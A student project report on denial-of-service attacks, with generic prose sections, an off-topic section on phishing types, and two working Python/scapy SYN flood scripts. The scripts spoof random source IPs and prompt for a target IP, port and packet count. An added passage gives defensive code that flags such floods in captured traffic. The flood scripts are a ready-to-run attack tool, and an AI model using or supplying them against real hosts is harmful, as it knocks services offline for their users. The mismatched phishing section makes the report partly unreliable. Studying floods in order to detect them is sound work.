
AMRITSAR GROUP OF COLLEGES

Autonomous Status Conferred by UGC, NACC-A Grade

PROJECT REPORT
On

“Dos Attack”

Submitted in partial fulfillment of the requirement for the award of the degree of

Bachelor of Technology
In
COMPUTER SCIENCE & ENGINEERING
Batch
(2020-2024)

Submitted To:
Head of Department (CSE)

Submitted By:
Simarpreet Singh (2000207)
Souvik Biswas (2000212)
Tanya Sharma (2000219)
Vanshita (2000228)

DEPARTMENT OF COMPUTER SCIENCE & ENGINEERING


Amritsar Group of Colleges, Amritsar
ABSTRACT

A Denial-of-Service (DoS) attack is a type of cyber attack that targets computer systems or
networks with the goal of overwhelming them with traffic or other forms of communication until
they become unusable. The purpose of a DoS attack is to disrupt the availability of the targeted
system, rendering it inaccessible to users or customers. There are several types of DoS attacks,
including volumetric attacks, which flood the targeted system with large amounts of traffic;
protocol attacks, which exploit weaknesses in network protocols to cause disruptions; and
application layer attacks, which target specific applications or services running on a system.
Defending against DoS attacks typically involves a combination of network infrastructure and
software-based solutions, as well as proactive monitoring and incident response planning.

ACKNOWLEDGEMENT

This is a humble effort to express our sincere gratitude towards those who have guided and
helped us to complete this project. A project is a major milestone during the study period of a
student. As such, this project was a challenge to us and was an opportunity to prove our caliber.
We are highly grateful and obliged to each and every one who helped us out of the problems
faced by the team. It would not have been possible to see through the undertaken project without
the guidance of Er. Jagminder Kaur. It was purely on the basis of their experience and
knowledge that we were able to clear all the theoretical and technical hurdles during the
development phases of this project work. Last but not least, we are very thankful to Dr.
Sandeep Kad, Head of Department, and all Faculty Members of the Computer Science
Department, who gave us an opportunity to face real-time problems while fulfilling the needs of an
organization by making projects for them.

DECLARATION

We hereby declare that the project work entitled “Dos Attack” has been completely prepared
by our team as a part of our core subject during this semester. This report is the outcome of our
efforts and has been submitted in the Department of Computer Science and Engineering. The
contents of this report are fully verified as per our knowledge.

Simarpreet Singh
University Roll No: 2000207

Souvik Biswas
University Roll No: 2000212

Tanya Sharma
University Roll No: 2000219

Vanshita
University Roll No: 2000228

INDEX

SR.NO CONTENT

1. Abstract
2. Acknowledgement
3. Declaration
4. List of Figures
5. Introduction to Project
6. Objective of Project
7. Project Scope
8. Features
9. Project Category
10. Structure of Program
11. Module Description
12. Code
13. Snapshots
14. Conclusion
15. References

List of Figures

Figure no Figure Title

1 Editor output
2 Wireshark analysis

INTRODUCTION OF PROJECT

DoS (Denial-of-Service) attacks have become very common among hackers, who use them as a
path to fame and respect in the underground groups of the Internet. A Denial-of-Service attack
denies valid Internet and network users the use of the services of the target network or server:
the attacker launches an attack that temporarily makes the services offered by the network
unusable by legitimate users.

In other words, a DoS attack is one in which you clog up so much memory on the target system
that it cannot serve legitimate users, or you send the target system data packets that it cannot
handle, causing it to crash, reboot or, more commonly, deny service to legitimate users.

DoS attacks are of the following types:

• Those that exploit vulnerabilities in the TCP/IP protocol suite.
• Those that exploit vulnerabilities in the IPv4 implementation.
• Brute-force attacks, which try to use up all the resources of the target system and make
the services unusable.

OBJECTIVE OF PROJECT

The objective of DoS attacks in cybersecurity could be to provide a comprehensive overview of
the topic, including the following:

1. A clear definition of DoS attacks and how they work, including the difference between a
DoS and a DDoS attack.
2. The impact of DoS attacks on businesses, including the financial costs, reputational
damage, and legal implications.
3. The different types of DoS attacks and their methods of execution, including
network-based attacks, application layer attacks, and protocol attacks.
4. Techniques and tools used by attackers to launch DoS attacks, including botnets,
amplification attacks, and reflection attacks.
5. Best practices for preventing and mitigating the risk of DoS attacks, including
implementing network security measures, monitoring traffic patterns, and implementing
contingency plans for responding to an attack.
6. Case studies of high-profile DoS attacks and their impact on businesses, along with an
analysis of the attackers' methods and motivations.

PROJECT SCOPE

The scope of a project on DoS attacks in cybersecurity would typically include the following:

1. Definition of the project goals and objectives, along with a clear understanding of the
target audience for the report.
2. Research on the different types of DoS attacks and their impact on businesses, including
case studies and examples of recent attacks.
3. Analysis of the methods and tools used by attackers to launch DoS attacks, including
techniques for identifying and mitigating these attacks.
4. Identification of best practices for preventing and mitigating the risk of DoS attacks,
including network security measures, monitoring traffic patterns, and implementing
contingency plans for responding to an attack.
5. Assessment of current industry standards and best practices related to DoS attack
prevention and mitigation.
6. Development of a comprehensive report that presents findings, analysis, and
recommendations related to DoS attacks in cybersecurity.
7. Presentation of the report to stakeholders and decision-makers, along with
recommendations for next steps and ongoing monitoring and maintenance of the
organization's cybersecurity defenses.

FEATURES

Some features of DoS attacks:

• Flood of traffic: DoS attacks flood the targeted system with a high volume of traffic or
requests, which causes the system to become unavailable to legitimate users.
• Exhausting resources: DoS attacks can exhaust the resources of the targeted system, such
as CPU cycles, memory, and network bandwidth.
• Multiple sources: Distributed Denial of Service (DDoS) attacks involve multiple sources,
such as botnets, amplifiers, and reflectors, that coordinate to attack a single target.
• Spoofing techniques: Attackers may use techniques like IP spoofing to disguise the origin
of the attack and make it more difficult to trace.
• Attack amplification: Attackers may use techniques like amplification attacks to increase
the volume of traffic directed at the target system, making it more difficult to defend
against.
• Layered attacks: Some DoS attacks target specific layers of the network stack, such as
the application layer, the transport layer, or the network layer.
• Impact on business: DoS attacks can have a significant impact on businesses, including
lost revenue, damage to reputation, and potential legal liabilities.
• Prevention and mitigation: There are several ways to prevent and mitigate the impact of
DoS attacks, including implementing network security measures, monitoring traffic
patterns, and implementing contingency plans for responding to an attack.

PROJECT CATEGORY

The project category for DoS attacks in cybersecurity would fall under the Information
Technology (IT) category. This would be focused on the technical aspects of DoS attacks,
including the techniques and tools used by attackers, as well as the prevention and mitigation
measures used to protect against these attacks. The IT category encompasses a wide range of
projects related to the development, deployment, and maintenance of computer systems and
software, including network security, software development, and cybersecurity.

• Importance of the IT category: The IT category is an essential part of modern businesses
and organizations. It includes everything from hardware and software to network
infrastructure and cybersecurity. The IT category plays a critical role in enabling
businesses to operate efficiently, communicate effectively, and stay competitive in the
digital age.
• Key areas of focus: Within the IT category, there are several key areas of focus, including
network security, data management, software development, and IT infrastructure. DoS
attacks fall within the network security domain, which is responsible for safeguarding
the integrity and availability of network resources and data.
• Career opportunities: The IT category offers a wide range of career opportunities for
professionals with diverse skill sets and backgrounds. IT professionals may work in roles
such as network administrators, cybersecurity specialists, software developers, data
analysts, or IT managers.
• Emerging technologies: The IT category is constantly evolving as new technologies
emerge and existing technologies are improved. Some of the emerging technologies
within the IT category include artificial intelligence, blockchain, and the Internet of
Things (IoT). These technologies offer exciting new possibilities for businesses and
organizations but also present new security challenges that must be addressed.
• Challenges and opportunities: The IT category presents both challenges and
opportunities for businesses and organizations. On one hand, advances in technology have
enabled businesses to operate more efficiently and effectively than ever before. On the
other hand, the complexity and interconnectedness of modern IT systems also make them
vulnerable to a wide range of threats, including DoS attacks. Effective management of IT
resources and security measures is essential to address these challenges and take
advantage of the opportunities presented by the IT category.
Application of DoS Attack

1. Types of organizations targeted: DoS attacks can target a wide range of organizations,
including financial institutions, government agencies, e-commerce websites, and online gaming
platforms. Provide examples of recent attacks on these types of organizations and the impact
they had.

2. Motivations of attackers: There are several reasons why attackers may launch DoS attacks,
including financial gain, political motives, and personal grudges. Provide examples of attacks
motivated by these factors and how they were executed.

3. Techniques used: Attackers use a variety of techniques to launch DoS attacks, including botnets,
amplification attacks, and application-layer attacks. Describe these techniques and how they
work, including real-world examples of each.

4. Impact on targeted organizations: DoS attacks can have a significant impact on targeted
organizations, including lost revenue, damage to reputation, and legal liabilities. Describe the
potential impact of a successful DoS attack and provide examples of organizations that have
suffered such an attack.

5. Prevention and mitigation: There are several ways to prevent and mitigate the impact of DoS
attacks, including implementing network security measures, monitoring traffic patterns, and
implementing contingency plans for responding to an attack. Describe these measures and how
they can be effective in mitigating the risk of a DoS attack.

6. Legal and ethical considerations: DoS attacks are illegal and unethical, and individuals or
organizations caught launching such attacks may face severe legal consequences. Discuss the
legal and ethical considerations of DoS attacks and the consequences that attackers may face if
caught.

STRUCTURE OF PROGRAM

Tools:- VS code

Visual Studio Code is a distribution of the Code - OSS repository with Microsoft-specific
customizations released under a traditional Microsoft product license. Visual Studio Code
combines the simplicity of a code editor with what developers need for their core
edit-build-debug cycle. It provides comprehensive code editing, navigation, and understanding
support along with lightweight debugging, a rich extensibility model, and lightweight
integration with existing tools.

Visual Studio Code is updated monthly with new features and bug fixes. You can download it
for Windows, macOS, and Linux on Visual Studio Code's website. To get the latest releases
every day, install the Insiders build.

Programming Language :- python

Python is a dynamically typed and garbage-collected programming language. It was created by
Guido van Rossum during 1985-1990. Like Perl, Python source code is also available under the
GNU General Public License (GPL).

Software Requirements:-

Operating system: Windows
Python Runtime Environment.

Hardware Requirements:-

Processor: 800 MHz Intel Pentium III or equivalent
Memory: 512 MB
Disk space: 1 GB of free disk space.

MODULE DESCRIPTION

Phishing attacks can take many forms, and their ultimate goal is to obtain sensitive information
such as usernames, passwords, credit card details, or personal data from unsuspecting individuals.
Here are some common types of phishing attacks:

1. Deceptive emails:

Attackers send emails that appear to be from a legitimate source, such as a bank or an
online retailer, asking the recipient to click on a link and enter their login credentials or
credit card information.

2. Spear phishing:

A targeted attack that is personalized to the recipient and appears to be from a trusted
source, such as a colleague or a business partner. These attacks often include a sense of
urgency or authority, encouraging the recipient to act quickly.

3. Smishing:

Similar to phishing, but the attack is delivered through a text message rather than email.
The attacker might send a text message that appears to be from a legitimate source, asking
the recipient to call a phone number or click on a link to enter their personal information.

4. Pharming:

Attackers redirect users to a fake website that appears to be legitimate, such as a bank or
an e-commerce site, where they enter their personal information.

5. Malware attacks:

Phishing emails may contain attachments or links that install malware on the user's
device, allowing the attacker to access information.

CODE

py3_SYN-Flood.py

from os import system


from sys import stdout
from scapy.all import *
from random import randint

def randomIP():
ip = ".".join(map(str, (randint(0,255)for _ in range(4))))
return ip

def randInt():
x = randint(1000,9000)
return x

def SYN_Flood(dstIP,dstPort,counter):
total = 0
print ("Packets are sending ...")

for x in range (0,counter):


s_port = randInt()
s_eq = randInt()
w_indow = randInt()

IP_Packet = IP ()
IP_Packet.src = randomIP()
IP_Packet.dst = dstIP

TCP_Packet = TCP ()
TCP_Packet.sport = s_port
TCP_Packet.dport = dstPort
TCP_Packet.flags = "S"
TCP_Packet.seq = s_eq
TCP_Packet.window = w_indow

send(IP_Packet/TCP_Packet, verbose=0)
total+=1
stdout.write("\nTotal packets sent: %i\n" % total)

def info():
system("clear")
print ("#####################################")

print ("# Welcome to Python3 SYN Flood Tool #")


print ("#####################################")

dstIP = input ("\nTarget IP : ")


dstPort = input ("Target Port : ")

return dstIP,int(dstPort)

def main():
dstIP,dstPort = info()
counter = input ("How many packets do you want to send : ")
SYN_Flood(dstIP,dstPort,int(counter))

py3_synflood_cmd.py

from sys import stdout


from scapy.all import *
from random import randint
from argparse import ArgumentParser

def randomIP():
ip = ".".join(map(str, (randint(0, 255)for _ in range(4))))
return ip

def randInt():
x = randint(1000, 9000)
return x

def SYN_Flood(dstIP, dstPort, counter):


total = 0
print ("Packets are sending ...")

for x in range (0, counter):


s_port = randInt()
s_eq = randInt()
w_indow = randInt()

IP_Packet = IP ()
IP_Packet.src = randomIP()
IP_Packet.dst = dstIP

TCP_Packet = TCP ()
TCP_Packet.sport = s_port
TCP_Packet.dport = int(dstPort)
TCP_Packet.flags = "S"
TCP_Packet.seq = s_eq
TCP_Packet.window = w_indow

send(IP_Packet/TCP_Packet, verbose=0)
total+=1

stdout.write("\nTotal packets sent: %i\n" % total)
def main():
parser = ArgumentParser()
parser.add_argument('--target', '-t', help='target IP address')
parser.add_argument('--port', '-p', help='target port number')
parser.add_argument('--count', '-c', help='number of packets')
parser.add_argument('--version', '-v', action='version', version='Python SynFlood Tool
v2.0.1\n@EmreOvunc')
parser.epilog = "Usage: python3 py3_synflood_cmd.py -t 10.20.30.40 -p 8080 -c 1"

args = parser.parse_args()

if args.target is not None:


if args.port is not None:
if args.count is None:
print('[!]You did not use --counter/-c parameter, so 1 packet will be sent..')
SYN_Flood(args.target, args.port, 1)

else:
SYN_Flood(args.target, args.port, int(args.count))

else:
print('[-]Please, use --port/-p to give target\'s port!')
print('[!]Example: -p 445')
print('[?] -h for help')
exit()
else:
print('''usage: py3_synflood_cmd.py [-h] [--target TARGET] [--port PORT]
[--count COUNT] [--version]
optional arguments:
-h, --help show this help message and exit
--target TARGET, -t TARGET
target IP address
--port PORT, -p PORT target port number
--count COUNT, -c COUNT
number of packets
--version, -v show program's version number and exit''')
sys.exit()

main()
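
A defender's view of the traffic the two listings above put on the wire, as an added example that is not part of the original report: the scripts draw the source address uniformly from 0.0.0.0 to 255.255.255.255 and take the sequence number and window from randint(1000, 9000), so captured SYNs can be scored on exactly those traits. The record layout, thresholds, addresses and function names are assumptions made for illustration.

```python
import ipaddress
import random
from collections import defaultdict

# Range the report's randInt() uses for source port, sequence number and window.
LOW, HIGH = 1000, 9000
# Short, non-exhaustive list of sources that should never arrive from the Internet.
BOGONS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/3")]

def is_bogon(src):
    ip = ipaddress.ip_address(src)
    return any(ip in net for net in BOGONS)

def score_syns(packets, min_syns=50):
    """Group bare SYNs by (dst, dport) and score each group.

    packets: iterable of dicts with src, dst, dport, flags, seq, window.
    Returns {(dst, dport): stats}; stats["flagged"] marks a likely flood."""
    groups = defaultdict(list)
    for p in packets:
        if p["flags"] == "S":          # SYN set, ACK clear
            groups[(p["dst"], p["dport"])].append(p)
    report = {}
    for key, syns in groups.items():
        n = len(syns)
        stats = {
            "syns": n,
            # Spoofed floods show close to one source address per packet.
            "src_ratio": len({p["src"] for p in syns}) / n,
            # Uniformly random sources land in bogon space about 14% of the time.
            "bogon": sum(is_bogon(p["src"]) for p in syns) / n,
            # Real stacks pick 32-bit ISNs; seq and window both in 1000..9000 is a tool trait.
            "low_seq": sum(LOW <= p["seq"] <= HIGH and LOW <= p["window"] <= HIGH
                           for p in syns) / n,
        }
        stats["flagged"] = (n >= min_syns and stats["src_ratio"] > 0.9
                            and (stats["low_seq"] > 0.9 or stats["bogon"] > 0.05))
        report[key] = stats
    return report

def constructed_capture(seed=7):
    """Constructed records standing in for a parsed capture (no packets are sent)."""
    rng = random.Random(seed)
    clients = ["198.51.100.%d" % i for i in range(1, 21)]
    legit = [{"src": rng.choice(clients), "dst": "192.0.2.10", "dport": 443,
              "flags": "S", "seq": rng.getrandbits(32), "window": 64240}
             for _ in range(200)]
    flood = [{"src": ".".join(str(rng.randint(0, 255)) for _ in range(4)),
              "dst": "192.0.2.10", "dport": 80, "flags": "S",
              "seq": rng.randint(LOW, HIGH), "window": rng.randint(LOW, HIGH)}
             for _ in range(500)]
    return legit + flood

if __name__ == "__main__":
    for key, stats in score_syns(constructed_capture()).items():
        print(key, stats)
```

The bogon share is the part of such traffic that ingress filtering at the network edge drops before it reaches the server; the sequence-number trait only identifies this particular script and disappears if the generator changes.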

Snapshot

Fig 1: Editor output

Fig 2: Wireshark analysis

CONCLUSION

DoS attack tools are readily available and any internet host is targetable as either a zombie or the
ultimate DoS focus. These attacks can be costly and frustrating and are difficult, if not impossible,
to eradicate. The best defence is to hinder attackers through vigilant system administration.
Applying patches, updating anti-malicious software programs, system monitoring, and reporting
incidents go further than retarding DDoS attacks – these defences also protect against other
attacks.

The Internet is not stable—it reforms itself rapidly. This means that DDoS countermeasures
quickly become obsolete. New services are offered through the Internet, and new attacks are
deployed to prevent clients from accessing these services. However, the basic issue is whether
DDoS attacks represent a network problem or an individual problem—or both. If attacks are
mainly a network problem, a solution could derive from alterations in Internet protocols.
Specifically, routers could filter malicious traffic, attackers could not spoof IP addresses, and
there would be no drawback in routing protocols. If attacks are mostly the result of individual
system weaknesses, the solution could derive from an effective IDS system, from an antivirus, or
from an invulnerable firewall. Attackers then could not compromise systems in order to create a
"zombies" army. Obviously, it appears that both network and individual hosts constitute the
problem. Consequently, countermeasures should be taken from both sides. Because attackers
cooperate in order to build the perfect attack methods, legitimate users and security developers
should also cooperate against the threat. The solution will arise from combining both network
and individual countermeasures.

REFERENCES

• https://www.geeksforgeeks.org/deniel-service-prevention/

• https://www.paloaltonetworks.com/cyberpedia/what-is-a-denial-of-service-attack-dos

• http://www.panix.com/press/synattack.html

• http://www.usenix.org/events/lisa2000/full_papers/dietrich/dietrich_html/
